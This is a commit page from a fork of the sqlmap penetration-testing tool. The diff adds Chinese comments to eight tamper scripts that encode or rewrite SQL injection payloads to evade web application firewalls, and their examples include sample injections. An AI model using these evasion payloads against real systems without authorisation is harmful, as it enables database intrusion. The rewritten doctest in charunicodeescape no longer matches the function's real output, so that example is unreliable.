ptnqoxywl
/
sqlmap
1
0
Fork 1
Code Issues Pull Requests 1 Packages Projects Releases Wiki Activity

修改

Browse Source
shichengkun_branch
sck 2 months ago
parent 8d2bd8e457
commit 7486672d56
8 changed files with 196 additions and 130 deletions
Show Stats Download Patch File Download Diff File

24
src/sqlmap-master/tamper/base64encode.py
Unescape View File

@ -5,20 +5,28 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
from lib.core.convert import encodeBase64 # 导入Base64编码函数
from lib.core.enums import PRIORITY # 导入优先级枚举
__priority__ = PRIORITY.LOW
__priority__ = PRIORITY.LOW # 设置优先级为低
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Base64-encodes all characters in a given payload
"""
这个函数用于篡改tamper输入的payload将所有字符进行Base64编码
参数
payload要篡改的原始payload
**kwargs其他可选参数在本函数中未使用
功能
对输入的payload进行Base64编码这可以用于绕过某些对特殊字符有限制的安全防护措施
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
示例
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
"""
return encodeBase64(payload, binary=False) if payload else payload
return encodeBase64(payload, binary=False) if payload else payload # 如果payload不为空则对其进行Base64编码binary=False表示结果为ASCII字符串

52
src/sqlmap-master/tamper/between.py
Unescape View File

@ -16,44 +16,46 @@ def dependencies():
def tamper(payload, **kwargs):
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
这个函数用于篡改tamper输入的payload将大于操作符'>)替换为'NOT BETWEEN 0 AND #',将等于操作符('=')替换为'BETWEEN # AND #'。
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
测试情况
* 微软 SQL Server 2005
* MySQL 4, 5.0 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
注意
* 这个替换很有用可以绕过那些只过滤大于字符的弱Web应用防火墙
* BETWEEN子句是SQL标准因此这个tamper脚本应该适用于所有数据库
示例
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
"""
retVal = payload
if payload:
retVal = payload # 初始化返回值
if payload:# 如果payload不为空
# 使用正则表达式查找并替换大于操作符('>
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
if match:
if match: # 如果找到匹配项
_ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
retVal = retVal.replace(match.group(0), _)
retVal = retVal.replace(match.group(0), _) # 替换匹配项
else:
retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload)
retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) # 替换大于操作符
if retVal == payload:
if retVal == payload: # 如果返回值未改变,尝试替换等于操作符('=
match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload)
if match:
if match:# 如果找到匹配项
_ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
retVal = retVal.replace(match.group(0), _)
retVal = retVal.replace(match.group(0), _)# 替换匹配项
return retVal
return retVal# 返回篡改后的payload

43
src/sqlmap-master/tamper/binary.py
Unescape View File

@ -16,28 +16,29 @@ def dependencies():
def tamper(payload, **kwargs):
"""
Injects keyword binary where possible
Requirement:
* MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
这个函数用于篡改tamper输入的payload注入MySQL中的关键字'binary'以尝试绕过某些安全防护措施
要求
* 仅适用于MySQL数据库
示例
>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
"""
retVal = payload
retVal = payload # 初始化返回值
if payload:
retVal = re.sub(r"\bNULL\b", "binary NULL", retVal)
retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal)
retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal)
retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal)
retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal)
retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal)
retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal)
if payload: # 如果payload不为空
retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) # 替换NULL为binary NULL
retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal)# 在THEN和ELSE后的数字或十六进制值前添加binary关键字
retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal)# 在数字比较操作中添加binary关键字
retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal)# 在AND或OR条件后的数字前添加binary关键字
retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal)# 在比较操作符前的数字前添加binary关键字
retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) # 在十六进制值前添加binary关键字
retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) # 移除多余的binary关键字
return retVal
return retVal # 返回篡改后的payload

38
src/sqlmap-master/tamper/bluecoat.py
Unescape View File

@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
import re# 导入正则表达式模块
from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.data import kb # 导入知识库包含SQL关键字等信息
from lib.core.enums import PRIORITY # 导入优先级枚举
# 设置优先级为普通
__priority__ = PRIORITY.NORMAL
def dependencies():
@ -17,34 +18,45 @@ def dependencies():
def tamper(payload, **kwargs):
"""
Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
这个函数用于篡改tamper输入的payload通过替换空格字符和等号来绕过Blue Coat SGOS的WAF
Requirement:
* Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147
功能
* 将SQL语句后的空格替换为有效的随机空白字符
* 将等号=替换为LIKE操作符
Tested against:
要求
* Blue Coat SGOS且WAF已激活参考文档https://kb.bluecoat.com/index?page=content&id=FAQ2147
测试情况
* MySQL 5.1, SGOS
Notes:
* Useful to bypass Blue Coat's recommended WAF rule configuration
注意
* 这个篡改方法对于绕过Blue Coat推荐的WAF规则配置很有用
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
示例
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
"""
def process(match):
"""
辅助函数用于处理正则匹配的结果
将匹配到的SQL关键字替换为带有%09制表符的版本
"""
word = match.group('word')
if word.upper() in kb.keywords:
return match.group().replace(word, "%s%%09" % word)
else:
return match.group()
retVal = payload
retVal = payload # 初始化返回值
if payload:
# 替换SQL关键字后跟非单词字符或字符串末尾的空格
retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)
# 将等号替换为LIKE操作符
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
# 移除多余的%09空格
retVal = retVal.replace("%09 ", "%09")
return retVal

35
src/sqlmap-master/tamper/chardoubleencode.py
Unescape View File

@ -5,10 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import string
import string # 导入字符串处理模块
from lib.core.enums import PRIORITY
from lib.core.enums import PRIORITY # 导入优先级枚举
# 设置优先级为低
__priority__ = PRIORITY.LOW
def dependencies():
@ -16,27 +17,31 @@ def dependencies():
def tamper(payload, **kwargs):
"""
Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
这个函数用于篡改tamper输入的payload通过双重URL编码所有字符不处理已经编码的字符
Notes:
* Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset
注意
* 这个技术很有用可以绕过一些不进行双重URL解码的弱Web应用防火墙
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
示例
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""
retVal = payload
retVal = payload # 初始化返回值
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload: # 如果payload不为空
retVal = "" # 初始化返回值字符串
i = 0 # 初始化索引
while i < len(payload): # 遍历payload中的每个字符
# 如果当前字符是%且后面两个字符是十六进制数字(已编码的字符),则进行双重编码
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
i += 3 # 移动索引,跳过已处理的三个字符
else:
# 对未编码的字符进行双重URL编码
retVal += '%%25%.2X' % ord(payload[i])
i += 1
i += 1 # 移动索引,处理下一个字符
return retVal
return retVal # 返回篡改后的payload

49
src/sqlmap-master/tamper/charencode.py
Unescape View File

@ -5,45 +5,54 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import string
import string # 导入字符串常量库,用于处理字符和十六进制数字
from lib.core.enums import PRIORITY
from lib.core.enums import PRIORITY # 从核心库导入优先级枚举
__priority__ = PRIORITY.LOWEST
__priority__ = PRIORITY.LOWEST# 设置优先级为最低
def dependencies():
pass
def tamper(payload, **kwargs):
"""
URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
这个函数用于篡改tamper输入的payload通过URL编码所有字符不处理已经编码的字符
Tested against:
功能
* 将输入的SQL语句中的所有字符进行URL编码
* 例如'SELECT'转换为'%53%45%4C%45%43%54'
测试情况
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* MySQL 4, 5.0 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS
注意
* 这个方法对于绕过一些非常弱的Web应用防火墙很有用这些防火墙在处理请求时不进行URL解码
* Web服务器会传递解码后的版本因此应该适用于任何数据库管理系统DBMS
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
示例
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""
retVal = payload
if payload:
retVal = ""
i = 0
retVal = payload # 初始化返回值为输入的payload
if payload: # 如果payload不为空
retVal = "" # 初始化返回值字符串
i = 0 # 初始化索引
# 遍历payload中的每个字符
while i < len(payload):
# 检查当前字符是否为%且后面两个字符是十六进制数字(已编码的字符)
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
i += 3
retVal += payload[i:i + 3] # 如果是已编码的字符,直接添加到返回值
i += 3 # 移动索引,跳过已处理的三个字符
else:
retVal += '%%%.2X' % ord(payload[i])
i += 1
# 对未编码的字符进行URL编码并添加到返回值
retVal += '%%%.2X' % ord(payload[i])# 将字符转换为其ASCII值的十六进制表示
i += 1 # 移动索引,处理下一个字符
return retVal
return retVal # 返回篡改后的payload

48
src/sqlmap-master/tamper/charunicodeencode.py
Unescape View File

@ -8,46 +8,62 @@ See the file 'LICENSE' for copying permission
import os
import string
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage # 从核心库导入单次警告消息函数
from lib.core.enums import PRIORITY # 从核心库导入优先级枚举
__priority__ = PRIORITY.LOWEST
__priority__ = PRIORITY.LOWEST # 设置优先级为最低
def dependencies():
"""
这个函数用于在运行时检查依赖关系并给出警告信息
功能
- 显示一条单次警告消息指出当前的tamper脚本仅适用于ASP或ASP.NET Web应用程序
"""
singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0])
def tamper(payload, **kwargs):
"""
Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
这个函数用于篡改tamper输入的payload通过Unicode-URL编码所有字符不处理已经编码的字符
参数
payload要篡改的原始payload
**kwargs其他可选参数在本函数中未使用
功能
- 将输入的payload中的字符转换为Unicode-URL编码格式例如'SELECT'转换为'%u0053%u0045%u004C%u0045%u0043%u0054'
Requirement:
* ASP
* ASP.NET
要求
* 仅适用于ASP和ASP.NET环境
Tested against:
测试情况
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
* Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset
注意
* 这个篡改方法对于绕过那些在处理请求前不进行Unicode URL解码的弱Web应用防火墙很有用
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
示例
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""
retVal = payload
retVal = payload # 初始化返回值为输入的payload
if payload:
retVal = ""
i = 0
if payload: # 如果payload不为空
retVal = "" # 初始化返回值字符串
i = 0 # 初始化索引
# 遍历payload中的每个字符
while i < len(payload):
# 如果当前字符是%且后面两个字符是十六进制数字已编码的字符则进行Unicode-URL编码
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "%%u00%s" % payload[i + 1:i + 3]
i += 3
else:
# 对未编码的字符进行Unicode-URL编码并添加到返回值
retVal += '%%u%.4X' % ord(payload[i])
i += 1

37
src/sqlmap-master/tamper/charunicodeescape.py
Unescape View File

@ -5,35 +5,48 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import string
import string # 导入字符串常量库,用于处理字符和十六进制数字
from lib.core.enums import PRIORITY
from lib.core.enums import PRIORITY # 从核心库导入优先级枚举
# 设置优先级为普通
__priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs):
"""
Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
这个函数用于篡改tamper输入的payload通过Unicode转义非编码字符不处理已经编码的字符
Notes:
* Useful to bypass weak filtering and/or WAFs in JSON contexes
参数
payload要篡改的原始payload
**kwargs其他可选参数在本函数中未使用
>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'
功能
- 将输入的payload中的字符转换为Unicode转义序列例如'SELECT'转换为'\u0053\u0045\u004C\u0045\u0043\u0054'
注意
* 这个方法对于绕过在JSON上下文中的弱过滤和/或Web应用防火墙WAFs很有用
示例
>>> tamper('SELECT FIELD FROM TABLE')
'\\u0053\\u0045\\u004C\\u0045\\u0043\\u0054 \\u0020\\u0046\\u0049\\u0045\\u004C\\u0044 \\u0046\\u0052\\u004F\\u004D \\u0054\\u0041\\u0042\\u004C\\u0045'
"""
retVal = payload
retVal = payload # 初始化返回值为输入的payload
if payload:
retVal = ""
i = 0
if payload: # 如果payload不为空
retVal = "" # 初始化返回值字符串
i = 0 # 初始化索引
# 遍历payload中的每个字符
while i < len(payload):
# 如果当前字符是%且后面两个字符是十六进制数字已编码的字符则进行Unicode转义
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "\\u00%s" % payload[i + 1:i + 3]
i += 3
else:
# 对未编码的字符进行Unicode转义并添加到返回值
retVal += '\\u%.4X' % ord(payload[i])
i += 1
i += 1 # 移动索引,处理下一个字符
return retVal

Write Preview
Loading…
Cancel
Save